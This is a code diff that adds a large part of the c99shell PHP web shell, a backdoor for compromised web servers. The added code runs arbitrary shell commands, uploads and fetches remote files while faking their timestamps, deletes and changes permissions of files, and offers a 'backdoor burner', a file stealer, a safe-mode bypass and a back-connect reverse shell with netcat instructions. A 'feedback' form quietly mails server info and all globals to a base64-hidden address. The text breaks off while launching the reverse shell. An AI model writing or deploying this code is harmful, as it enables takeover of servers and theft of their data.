+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+if ($act == "search") 
+{ 
+ echo "<b>Search in file-system:</b><br>"; 
+ if (empty($search_in)) {$search_in = $d;} 
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
+ if (!empty($submit)) 
+ { 
+  $found = array(); 
+  $found_d = 0; 
+  $found_f = 0; 
+  $search_i_f = 0; 
+  $search_i_d = 0; 
+  $a = array 
+  ( 
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
+   "text_wwo"=>$search_text_wwo, 
+   "text_cs"=>$search_text_cs, 
+   "text_not"=>$search_text_not 
+  ); 
+  $searchtime = getmicrotime(); 
+  $in = array_unique(explode(";",$search_in)); 
+  foreach($in as $v) {c99fsearch($v);} 
+  $searchtime = round(getmicrotime()-$searchtime,4); 
+  if (count($found) == 0) {echo "<b>No files found!</b>";} 
+  else 
+  { 
+   $ls_arr = $found; 
+   $disp_fullpath = TRUE; 
+   $act = "ls"; 
+  } 
+ } 
+ echo "<form method=POST> 
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
+<br><br><input type=submit name=submit value=\"Search\"></form>"; 
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
+} 
+if ($act == "chmod") 
+{ 
+ $mode = fileperms($d.$f); 
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
+ else 
+ { 
+  $form = TRUE; 
+  if ($chmod_submit) 
+  { 
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
+   else {$err = "Can't chmod to ".$octet.".";} 
+  } 
+  if ($form) 
+  { 
+   $perms = parse_perms($mode); 
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
+  } 
+ } 
+} 
+if ($act == "upload") 
+{ 
+ $uploadmess = ""; 
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
+ if (empty($uploadpath)) {$uploadpath = $d;} 
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
+ if (!empty($submit)) 
+ { 
+  global $HTTP_POST_FILES; 
+  $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
+  if (!empty($uploadfile["tmp_name"])) 
+  { 
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
+   else {$destin = $userfilename;} 
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
+  } 
+  elseif (!empty($uploadurl)) 
+  { 
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
+   else 
+   { 
+    $destin = explode("/",$destin); 
+    $destin = $destin[count($destin)-1]; 
+    if (empty($destin)) 
+    { 
+     $i = 0; 
+     $b = ""; 
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
+   } 
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
+   else 
+   { 
+    $st = getmicrotime(); 
+    $content = @file_get_contents($uploadurl); 
+    $dt = round(getmicrotime()-$st,4); 
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
+    else 
+    { 
+     if ($filestealth) {$stat = stat($uploadpath.$destin);} 
+     $fp = fopen($uploadpath.$destin,"w"); 
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
+     else 
+     { 
+      fwrite($fp,$content,strlen($content)); 
+      fclose($fp); 
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
+     } 
+    } 
+   } 
+  } 
+ } 
+ if ($miniform) 
+ { 
+  echo "<b>".$uploadmess."</b>"; 
+  $act = "ls"; 
+ } 
+ else 
+ { 
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
+File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
+<input type=submit name=submit value=\"Upload\"> 
+</form>"; 
+ } 
+} 
+if ($act == "delete") 
+{ 
+ $delerr = ""; 
+ foreach ($actbox as $v) 
+ { 
+  $result = FALSE; 
+  $result = fs_rmobj($v); 
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} 
+ } 
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} 
+ $act = "ls"; 
+} 
+if (!$usefsbuff) 
+{ 
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
+} 
+else 
+{ 
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actarcbuff) 
+ { 
+  $arcerr = ""; 
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
+  else {$ext = ".tar.gz";} 
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
+  $cmdline .= " ".$actarcbuff_path; 
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
+  foreach($objects as $v) 
+  { 
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
+   if (is_dir($v)) 
+   { 
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
+    $v .= "*"; 
+   } 
+   $cmdline .= " ".$v; 
+  } 
+  $tmp = realpath("."); 
+  chdir($d); 
+  $ret = myshellexec($cmdline); 
+  chdir($tmp); 
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
+  $ret = str_replace("\r\n","\n",$ret); 
+  $ret = explode("\n",$ret); 
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   if (in_array($v,$ret)) {fs_rmobj($v);} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+} 
+if ($act == "cmd") 
+{ 
+if (trim($cmd) == "ps -aux") {$act = "processes";} 
+elseif (trim($cmd) == "tasklist") {$act = "processes";} 
+else 
+{ 
+ @chdir($chdir); 
+ if (!empty($submit)) 
+ { 
+  echo "<b>Result of execution this command</b>:<br>"; 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  $ret = myshellexec($cmd); 
+  $ret = convert_cyr_string($ret,"d","w"); 
+  if ($cmd_txt) 
+  { 
+   $rows = count(explode("\r\n",$ret))+1; 
+   if ($rows < 10) {$rows = 10;} 
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+  } 
+  else {echo $ret."<br>";} 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
+} 
+} 
+if ($act == "ls") 
+{ 
+ if (count($ls_arr) > 0) {$list = $ls_arr;} 
+ else 
+ { 
+  $list = array(); 
+  if ($h = @opendir($d)) 
+  { 
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
+   closedir($h); 
+  } 
+  else {} 
+ } 
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
+ else 
+ { 
+  //Building array 
+  $objects = array(); 
+  $vd = "f"; //Viewing mode 
+  if ($vd == "f") 
+  { 
+   $objects["head"] = array(); 
+   $objects["folders"] = array(); 
+   $objects["links"] = array(); 
+   $objects["files"] = array(); 
+   foreach ($list as $v) 
+   { 
+    $o = basename($v); 
+    $row = array(); 
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) {$type = "LINK";} 
+     else {$type = "DIR";} 
+     $row[] = $v; 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
+    $row[] = filemtime($v); 
+    if (!$win) 
+    { 
+     $ow = posix_getpwuid(fileowner($v)); 
+     $gr = posix_getgrgid(filegroup($v)); 
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
+    } 
+    $row[] = fileperms($v); 
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
+    elseif (is_link($v)) {$objects["links"][] = $row;} 
+    elseif (is_dir($v)) {$objects["folders"][] = $row;} 
+    elseif (is_file($v)) {$objects["files"][] = $row;} 
+    $i++; 
+   } 
+   $row = array(); 
+   $row[] = "<b>Name</b>"; 
+   $row[] = "<b>Size</b>"; 
+   $row[] = "<b>Modify</b>"; 
+   if (!$win) 
+  {$row[] = "<b>Owner/Group</b>";} 
+   $row[] = "<b>Perms</b>"; 
+   $row[] = "<b>Action</b>"; 
+   $parsesort = parsesort($sort); 
+   $sort = $parsesort[0].$parsesort[1]; 
+   $k = $parsesort[0]; 
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
+   $row[$k] .= $y; 
+   for($i=0;$i<count($row)-1;$i++) 
+   { 
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
+   } 
+   $v = $parsesort[0]; 
+   usort($objects["folders"], "tabsort"); 
+   usort($objects["links"], "tabsort"); 
+   usort($objects["files"], "tabsort"); 
+   if ($parsesort[1] == "d") 
+   { 
+    $objects["folders"] = array_reverse($objects["folders"]); 
+    $objects["files"] = array_reverse($objects["files"]); 
+   } 
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
+   $tab = array(); 
+   $tab["cols"] = array($row); 
+   $tab["head"] = array(); 
+   $tab["folders"] = array(); 
+   $tab["links"] = array(); 
+   $tab["files"] = array(); 
+   $i = 0; 
+   foreach ($objects as $a) 
+   { 
+    $v = $a[0]; 
+    $o = basename($v); 
+    $dir = dirname($v); 
+    if ($disp_fullpath) {$disppath = $v;} 
+    else {$disppath = $o;} 
+    $disppath = str2mini($disppath,60); 
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
+    foreach ($regxp_highlight as $r) 
+    { 
+     if (ereg($r[0],$o)) 
+     { 
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
+      else 
+      { 
+       $r[1] = round($r[1]); 
+       $isdir = is_dir($v); 
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
+       { 
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
+        $disppath = $r[2].$disppath.$r[3]; 
+        if ($r[4]) {break;} 
+       } 
+      } 
+     } 
+    } 
+    $uo = urlencode($o); 
+    $ud = urlencode($dir); 
+    $uv = urlencode($v); 
+    $row = array(); 
+    if ($o == ".") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif ($o == "..") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) 
+     { 
+      $disppath .= " => ".readlink($v); 
+      $type = "LINK"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+     } 
+     else 
+     { 
+      $type = "DIR"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+      } 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) 
+    { 
+     $ext = explode(".",$o); 
+     $c = count($ext)-1; 
+     $ext = $ext[$c]; 
+     $ext = strtolower($ext); 
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
+     $row[] = view_size($a[1]); 
+    } 
+    $row[] = date("d.m.Y H:i:s",$a[2]); 
+    if (!$win) {$row[] = $a[3];} 
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
+    elseif (is_link($v)) {$tab["links"][] = $row;} 
+    elseif (is_dir($v)) {$tab["folders"][] = $row;} 
+    elseif (is_file($v)) {$tab["files"][] = $row;} 
+    $i++; 
+   } 
+  } 
+  // Compiling table 
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; 
+  foreach($table as $row) 
+  { 
+   echo "<tr>\r\n"; 
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
+   echo "</tr>\r\n"; 
+  } 
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
+  <script> 
+  function ls_setcheckboxall(status) 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = status; 
+    id++; 
+   } 
+  } 
+  function ls_reverse_all() 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
+    id++; 
+   } 
+  } 
+  </script> 
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
+  { 
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
+  } 
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
+  if ($usefsbuff) 
+  { 
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; 
+  } 
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; 
+  echo "</form>"; 
+ } 
+} 
+if ($act == "tools") 
+{ 
+
+
+
+
+
+
+ ?> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57  </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">
+    </div>
+ <form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+  
+ 
+   <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+   
+   </center>
+    </td>
+</tr></TABLE>
+ 
+ 
+ 
+ 
+ 
+
+
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><b>Error_Log SAfe Mode Bypass By Adora </b>
+      <form action="<?php echo $surl; ?>" method="POST">
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84>
+    <input type="submit" value="Write 2 File !!">
+    
+    </form>
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    </div>
+ 
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+   <form action="<?php echo $surl; ?>" method="POST">
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500  value=""><br><br> 
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> 
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> 
+</form>
+<br><br><br>
+   
+   
+   
+   
+   </center>
+   
+   </center>
+    </td>
+</tr></TABLE>
+
+
+
+
+
+
+
+
+
+
+
+
+<?php 
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) 
+{ 
+ cf("/tmp/back",$back_connect); 
+ $p2=which("perl"); 
